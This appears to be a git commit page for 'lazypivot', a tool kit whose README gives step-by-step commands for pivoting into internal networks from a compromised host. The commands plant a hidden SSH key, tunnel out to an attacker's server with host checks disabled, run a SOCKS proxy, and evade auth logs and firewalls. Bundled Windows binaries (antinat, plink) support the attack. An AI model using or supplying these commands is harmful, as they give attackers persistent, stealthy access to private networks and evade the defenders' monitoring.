Home Explore Help
Sign In
g
/
lazypivot
1
0
Fork 0
Files Issues 0 Pull Requests 0 Wiki
Browse Source

fast release

Giulio 4 years ago
commit
9807d3fcb5
7 changed files with 82 additions and 0 deletions
Split View Show Diff Stats
  1. 61 0
      Readme.md
  2. 1 0
      linux/Readme.md
  3. BIN
      windows/antinat.dll
  4. BIN
      windows/antinat.exe
  5. 20 0
      windows/antinat.xml
  6. BIN
      windows/plink.exe
  7. BIN
      windows/upload.zip

+ 61 - 0
Readme.md
View File 

@@ -0,0 +1,61 @@
 
+# Lazypivot
 
+Making pivoting into internal networks easier and faster so you can focus on the real fun :)
 
+
 
+## Principles
 
+The idea is to executa a socks5 server on the compromised target and forward the local exposed port remotely via SSH.
 
+A remote server or any other mean of exposing a port on the internet is required. When SSH server is not available there's [antinat](http://www.malsmith.net/antinat/) coming to the rescue.
 
+
 
+## Linux
 
+### Simpler
 
+On our server 
+```
 
+useradd -m -s /bin/nologin targetname
 
+ssh-keygen -t ecdsa -f /tmp/sshkey  -q -N ""
 
+mkdir /home/targetname/.ssh
 
+cp /tmp/sshkey.pub /home/targetname/.ssh/authorized_keys
 
+chown -R targetname:targetname /home/targetname/.ssh
 
+chmod 600 /home/targetname/.ssh/authorized_keys
 
+cat /tmp/sshkey
 
+```
 
+
 
+Copy the content of /tmp/sshkey
 
+
 
+On the compromised host
 
+
 
+```
 
+echo "my copied sshkey" >> /tmp/.keyfile
 
+chmod 600 /tmp/.keyfile
 
+ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -L 22:127.0.0.1:2222 -i /tmp/.keyfile -fNT targetname@myserver
 
+```
 
+
 
+Now on your server
 
+
 
+```
 
+ssh -D 0.0.0.0:8080 compromiseduser@127.0.0.1 -p 2222 -fNT
 
+```
 
+
 
+### Stealthier
 
+We can combine the `antinat` proxy with the above procedure in order not to login onn the ssh server and thus writing on the auth logs.
 
+
 
+Instead of using with the socks options, upload the provided package and directly forward the `antinat` port.
 
+## Windows
 
+
 
+Upload the package and extract it with 7z.exe.
 
+
 
+Start the antinat binary, no admin permissions are required:
 
+
 
+```
 
+antinat.exe -a -cantinat.xml
 
+```
 
+
 
+Forward the antinat port with plink:
 
+
 
+```
 
+plink -ssh -noagent -pw "password" -L 32768:127.0.0.1:8080 targetname@myserver
 
+```
 
+
 
+
 
+## Tips
 
+
 
+ * Make ssh listen on port 443 to be less suspicious and bypass lame firewall rules
 
+ * [User corkscrew for SSH via HTTP Proxy](https://github.com/bryanpkc/corkscrew)

+ 1 - 0
linux/Readme.md
View File 

@@ -0,0 +1 @@
 
+Antinat linux build TODO

BIN
windows/antinat.dll
View File


BIN
windows/antinat.exe
View File


+ 20 - 0
windows/antinat.xml
View File 

@@ -0,0 +1,20 @@
 
+<?xml version='1.0'?>

+<antinatconfig>

+	<!-- Any interface -->

+	<interface value='127.0.0.1'/>

+

+	<!-- Port to listen on -->

+	<port value='32768'/>

+

+	<!-- What security methods do we offer clients? -->

+	<authchoice>

+		<select mechanism='anonymous'/>

+		<select mechanism='chap'/>

+		<select mechanism='cleartext'/>

+	</authchoice>

+

+	<!-- Which connections should we accept or reject? -->

+	<filter>

+		<accept/>

+	</filter>

+</antinatconfig>

BIN
windows/plink.exe
View File


BIN
windows/upload.zip
View File